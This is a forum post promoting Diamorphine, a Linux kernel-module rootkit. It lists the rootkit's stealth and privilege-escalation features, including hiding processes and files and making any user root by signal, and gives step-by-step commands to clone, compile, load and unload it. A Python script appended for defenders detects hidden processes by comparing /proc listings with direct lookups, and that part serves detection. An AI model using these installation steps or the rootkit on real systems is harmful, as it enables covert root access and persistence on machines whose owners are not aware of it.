Diamorphine is a LKM rootkit for Linux Kernels 2.6.X/3.X



raiden
2015-12-26, 19:11
Diamorphine is a LKM rootkit for Linux Kernels 2.6.X/3.X
Features

When loaded, the module starts invisible;

Hide/unhide any process by sending a signal 31;

Sending a signal 63 (to any pid) makes the module become (in)visible;

Sending a signal 64 (to any pid) makes the given user become root;

Files or directories starting with the MAGIC_PREFIX become invisible;

Source: https://github.com/m0nad/Diamorphine

Installation

Verify if the kernel is 2.6.X/3.X

uname -r

Clone the repository

git clone https://github.com/m0nad/Diamorphine

Enter the folder

cd Diamorphine

Compile

make

Load the module (as root)

insmod diamorphine.ko

Uninstallation

The module starts invisible; to remove it, you need to make it visible

kill -63 0

Then remove the module (as root)

rmmod diamorphine
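
For defenders, the process-hiding feature listed above can be checked for by comparing what a /proc directory listing returns with what direct path lookups return. The script below is an added example, not part of the original post or of the Diamorphine project; it assumes hiding works by filtering directory listings while /proc/<pid> still resolves by path (the post does not say how hiding is implemented), and all function names are hypothetical.

```python
import os

def listed_pids(proc="/proc"):
    """PIDs returned by a directory listing of /proc (the view ps and top use)."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}

def is_group_leader(pid, proc="/proc"):
    """True if /proc/<pid>/status opens by direct path and Tgid equals pid.

    Thread IDs also resolve under /proc but are never listed there, so they
    must be excluded or every multi-threaded program looks hidden.
    """
    try:
        with open(os.path.join(proc, str(pid), "status")) as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except (OSError, ValueError, IndexError):
        pass
    return False

def pid_max(proc="/proc"):
    """Upper bound of the PID space; fall back to the classic default."""
    try:
        with open(os.path.join(proc, "sys", "kernel", "pid_max")) as fh:
            return int(fh.read())
    except (OSError, ValueError):
        return 32768

def hidden_pids(proc="/proc", lister=listed_pids):
    """PIDs that are alive by direct lookup but missing from the listing.

    The listing is taken before and after the sweep, and each suspect is
    probed twice, so processes that start or exit mid-scan are not reported.
    """
    before = lister(proc)
    suspects = [p for p in range(1, pid_max(proc))
                if p not in before and is_group_leader(p, proc)]
    after = lister(proc)
    return sorted(p for p in suspects
                  if p not in after and is_group_leader(p, proc))

if __name__ == "__main__":
    found = hidden_pids()
    for pid in found:
        print(f"PID {pid} answers direct /proc lookup but is not listed")
    print(f"{len(found)} hidden PID(s) found")
```

Run it as root so that status files are readable regardless of /proc mount options. A clean result only rules out hiding by listing filter; kernel code that also blocks direct lookups would not be caught this way.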